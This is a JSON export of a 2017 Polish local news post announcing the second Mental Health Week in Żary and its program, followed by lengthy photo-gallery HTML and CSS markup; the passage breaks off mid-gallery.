{"id":7606,"date":"2017-09-27T16:29:01","date_gmt":"2017-09-27T14:29:01","guid":{"rendered":"http:\/\/moja24.pl\/?p=7606"},"modified":"2019-04-27T02:34:36","modified_gmt":"2019-04-27T00:34:36","slug":"w-trosce-o-zdrowie-psychiczne","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/09\/27\/w-trosce-o-zdrowie-psychiczne\/","title":{"rendered":"W trosce o zdrowie psychiczne"},"content":{"rendered":"<p><b>Trwa II \u017barski Tydzie\u0144 Zdrowia Psychicznego. Drug\u0105 edycj\u0119 wydarzenia zako\u0144czy konferencja w \u017carskim ratuszu z udzia\u0142em znanego seksuologa, profesora Zbigniewa Izdebskiego.<\/b><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-7613\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596-199x300.jpg\" alt=\"\" width=\"199\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596-768x1155.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596-681x1024.jpg 681w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596-696x1047.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596-1068x1606.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596-279x420.jpg 279w\" sizes=\"auto, (max-width: 199px) 100vw, 199px\" \/>Wydarzenie rozpocz\u0105\u0142 &#8222;Przegl\u0105d Tw\u00f3rczo\u015bci Os\u00f3b z Zaburzeniami Psychicznymi&#8221; w ramach odbywaj\u0105cego si\u0119 Zjazdu \u015arodowiskowych Dom\u00f3w Pomocy Spo\u0142ecznej. W kolejnym dniu mo\u017cna by\u0142o zasi\u0119gn\u0105\u0107 bezp\u0142atnych konsultacji w czterech \u017carskich poradniach zdrowia psychicznego, a w kolejnym wzi\u0105\u0107 udzia\u0142 w akcji &#8222;Rusz si\u0119 po zdrowie &#8230; psychiczne &#8211; II edycja&#8221;. Wszyscy zainteresowani mogli wsp\u00f3lnie po\u0107wiczy\u0107 jog\u0119, pota\u0144czy\u0107 hip-hop i break dance pod okiem Artura Niezgody, i zapozna\u0107 si\u0119 ze sztuka walki Muay Thai.<br \/>\nW ramach tygodniowego programu, w czwartek o godz. 9:00 b\u0119dzie mo\u017cna w \u017carskim ratuszu obejrze\u0107 film psychologiczny &#8222;Pokolenie P&#8221;.<br \/>\nW pi\u0105tek (29 wrze\u015bnia) o godz. 9:00 w sali \u017carskiego ratusza rozpocznie si\u0119 konferencja<br \/>\nI \u017barskiego Tygodnia Zdrowia Psychicznego. Wyst\u0105pi prof. dr hab. Zbigniew Izdebski, pedagog i seksuolog, specjalista w zakresie poradnictwa rodzinnego. Wyst\u0105pienie b\u0119dzie po\u015bwi\u0119cone tematyce: &#8222;Zagro\u017ce\u0144 rozwoju sfery seksualnej dzieci i m\u0142odzie\u017cy&#8221;. Drugim prelegentem b\u0119dzie Ewa Parandowska, koordynator programu &#8222;Czarne Fale &#8211; lekcje o depresji&#8221; Fundacji III Kliniki Psychiatrii SYNTONIA. Wyst\u0105pienie b\u0119dzie po\u015bwi\u0119cone tematyce depresji dzieci i m\u0142odzie\u017cy.<\/p>\n\r\n                <style type=\"text\/css\">\r\n                    \r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item1 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-26-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item2 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-25-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item3 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-24-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item4 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-23-e1506522148951-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item5 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-22-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item6 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-21-e1506522260161-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item7 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-20-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item8 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-19-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item9 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-18-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item10 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-17-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item11 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-16-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item12 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-15-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item13 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-14-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item14 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-13-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item15 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-12-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item16 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-11-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item17 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-10-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item18 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-9-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item19 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-8-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item20 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-7-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item21 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item22 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-5-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item23 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-4-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item24 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-3-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item25 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-2-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f46f41e8441  .td-doubleSlider-2 .td-item26 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-1-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                <\/style>\r\n\r\n                <div id=\"td_uid_1_69f46f41e8441\" class=\"td-slide-on-2-columns\">\r\n                    <div class=\"post_td_gallery\">\r\n                        <div class=\"td-gallery-slide-top\">\r\n                           <div class=\"td-gallery-title\">II Tydzie\u0144 Zdrowia Psychicznego w \u017barach 2017<\/div>\r\n\r\n                            <div class=\"td-gallery-controls-wrapper\">\r\n                                <div class=\"td-gallery-slide-count\"><span class=\"td-gallery-slide-item-focus\">1<\/span> of 26<\/div>\r\n                                <div class=\"td-gallery-slide-prev-next-but\">\r\n                                    <i class = \"td-icon-left doubleSliderPrevButton\"><\/i>\r\n                                    <i class = \"td-icon-right doubleSliderNextButton\"><\/i>\r\n                                <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-1 \">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-slide-item td-item1\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-26.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (26)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-26-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-26-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-26-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-26-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-26-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-26-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-26-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item2\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-25.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (25)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-25-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-25-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-25-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-25-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-25-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-25-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-25-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item3\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-24.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (24)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-24-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-24-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-24-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-24-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-24-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-24-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-24-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item4\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-23-e1506522148951.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (23)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-23-e1506522148951-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-23-e1506522148951-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-23-e1506522148951-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-23-e1506522148951-768x1155.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-23-e1506522148951-681x1024.jpg 681w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-23-e1506522148951-696x1047.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-23-e1506522148951-1068x1606.jpg 1068w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item5\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-22.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (22)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-22-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-22-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-22-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-22-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-22-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-22-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-22-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item6\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-21-e1506522260161.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (21)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-21-e1506522260161-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-21-e1506522260161-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-21-e1506522260161-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-21-e1506522260161-768x1155.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-21-e1506522260161-681x1024.jpg 681w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-21-e1506522260161-696x1047.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-21-e1506522260161-1068x1606.jpg 1068w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item7\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-20.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (20)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-20-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-20-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-20-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-20-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-20-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-20-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-20-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item8\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-19.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (19)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-19-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-19-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-19-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-19-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-19-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-19-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-19-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item9\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-18.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (18)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-18-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-18-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-18-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-18-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-18-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-18-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-18-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item10\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-17.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (17)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-17-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-17-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-17-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-17-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-17-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-17-696x463.jpg 696w, 